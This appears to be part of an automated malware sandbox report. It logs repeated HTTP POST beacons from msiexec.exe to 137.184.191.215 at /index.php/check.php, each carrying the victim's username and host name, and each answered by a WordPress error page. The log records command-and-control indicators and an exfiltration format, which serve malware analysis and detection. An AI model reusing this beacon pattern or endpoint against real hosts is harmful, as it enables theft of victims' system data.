                                        Oct 2, 2024 07:19:27.707361937 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:30.379097939 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:28 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:30.379656076 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:19:30.379667044 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:19:30.380639076 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.459091137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:30.545875072 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:30.551426888 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:33.224482059 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:31 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:33.224961042 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:33.224972010 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.459092137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:33.388360977 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:33.393218040 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:36.056476116 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:33 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:36.056906939 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:36.056917906 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.459093137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:36.215107918 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:36.220072031 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:38.827873945 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:36 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:38.828331947 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:38.828349113 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.459094137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:38.970418930 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:38.975579023 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:41.575835943 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:39 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:41.576193094 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:41.576204062 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.459095137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:41.718657017 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:41.723886013 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:44.443887949 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:42 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
